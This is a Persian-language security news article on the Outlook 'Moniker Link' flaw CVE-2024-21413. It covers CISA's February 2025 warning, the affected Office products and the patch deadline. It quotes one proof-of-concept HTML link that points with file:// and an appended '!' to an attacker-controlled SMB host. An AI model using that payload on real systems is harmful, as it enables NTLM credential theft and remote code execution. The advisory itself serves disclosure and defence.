آسیب ‌پذیری CVE-2024-21413 در Microsoft Outlook مورد سوءاستفاده قرار گرفت

آژانس امنیت سایبری و امنیت زیرساخت ایالات متحده (CISA)، ششم فوریه ۲۰۲۵ به آژانس‌های فدرال ایالات متحده هشدار داد تا سیستم‌های خود را در برابر حملات جاری که یک آسیب ‌پذیری بحرانی اجرای کد از راه دور (RCE) را در Microsoft Outlook مورد هدف قرار می‌دهد، ایمن کنند.

این آسیب ‌پذیری که توسط هایفی لی، محقق آسیب‌ پذیری Check Point، کشف شده و با شناسه CVE-2024-21413 دنبال می‌شود، به دلیل اعتبارسنجی نادرست ورودی هنگام باز کردن ایمیل‌های حاوی لینک‌های مخرب در نسخه‌های آسیب ‌پذیر Outlook ایجاد می‌شود.

مهاجم می‌تواند از طریق ایمیل‌هایی که حاوی لینک‌های آلوده هستند، سیستم هدف را مورد نفوذ قرار دهد. هنگامی که کاربر، یک ایمیل حاوی لینک مخرب را در نسخه‌های آسیب ‌پذیر Outlook باز می‌کند، نمای محافظت ‌شده (Protected View) که معمولاً برای جلوگیری از باز شدن محتوای مخرب در فایل‌های آفیس طراحی شده است، به درستی اعمال نمی‌شود.

نمای محافظت‌شده باید فایل‌ها را به‌طور پیش‌فرض در حالت فقط خواندنی باز کند تا از اجرای هرگونه کد مخرب جلوگیری کند. اما این آسیب ‌پذیری به مهاجم این امکان را می‌دهد تا فایل‌های آفیس را در حالت ویرایش باز کرده و کد دلخواه را اجرا کند.

مهاجم با ارسال یک ایمیل حاوی لینک به یک فایل آفیس مخرب، می‌تواند از این آسیب ‌پذیری سوء استفاده کند. زمانی که کاربر بر روی لینک مورد نظر کلیک می‌کند، فایل مخرب در Outlook باز می‌شود و در نتیجه کد دلخواه بر روی سیستم هدف اجرا می‌شود. این به مهاجم اجازه می‌دهد تا به دستگاه قربانی دسترسی پیدا کند و انواع حملات مختلف از جمله سرقت اطلاعات، نصب بدافزار و یا حتی کنترل کامل سیستم را به انجام رساند.

هنگامی که مایکروسافت یک سال پیش آسیب ‌پذیری CVE-2024-21413 را در Patch Tuesday ماه فوریه ۲۰۲۴ پچ کرد، هشدار داد که پنجره پیش‌ نمایش (Preview Pane) به مهاجمان این امکان را می‌دهد که حتی زمانی که اسناد آفیس مخرب را در حالت پیش‌نمایش مشاهده می‌کنند، از این آسیب ‌پذیری سوء استفاده کنند.

طبق توضیحات Check Point، این نقص امنیتی (که با نام Moniker Link شناخته می‌شود) به مهاجماناجازه می‌دهد تا محافظت‌های داخلی Outlook را برای لینک‌های مخرب تعبیه ‌شده در ایمیل‌ها، که از پروتکل file:// استفاده می‌کنند، دور بزنند. این حملات با اضافه کردن یک علامت تعجب (!) به آدرس‌های URL که به سرورهای تحت کنترل مهاجمان اشاره دارند، قابل انجام هستند.

علامت تعجب بلافاصله پس از پسوند فایل همراه با متن تصادفی (در مثال Check Point از “something” استفاده شده است) اضافه می‌شود، به مثال زیر توجه کنید:

				
					*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

این تکنیک به مهاجمان اجازه می‌دهد تا محافظت‌های داخلی Outlook مانند نمای محافظت ‌شده (Protected View) را دور بزنند و کد مخرب را بر روی سیستم هدف اجرا کنند.

CVE-2024-21413 چندین محصول آفیس را تحت تاثیر قرار می‌دهد، از جمله:

Microsoft Office LTSC 2021
Microsoft 365 Apps (نسخه Enterprise)
Microsoft Outlook 2016
Microsoft Office 2019

حمله موفق به این آسیب ‌پذیری می‌تواند منجر به سرقت داده‌های NTLM و اجرای کد دلخواه از طریق اسناد آفیس مخرب شود. این آسیب ‌پذیری به مهاجمان این امکان را می‌دهد تا به‌طور غیرمجاز به سیستم‌های آسیب ‌پذیر دسترسی پیدا کرده و اطلاعات حساس را بربایند یا کنترل سیستم را در اختیار گیرند.

CISA ششم فوریه ۲۰۲۵، آسیب ‌پذیری CVE-2024-21413 را به فهرست آسیب‌ پذیری‌های شناخته شده مورد اکسپلویت (KEV) خود افزود و آن را به‌عنوان آسیب ‌پذیری فعال معرفی کرد. بر اساس دستور عملیاتی Binding Operational Directive (BOD) 22-01، آژانس‌های فدرال موظف هستند که شبکه‌های خود را تا تاریخ ۲۷ فوریه ایمن‌سازی کنند. CISA به سازمان‌های خصوصی نیز توصیه کرده است پچ این آسیب پذیری را در اولویت کار خود قرار دهند.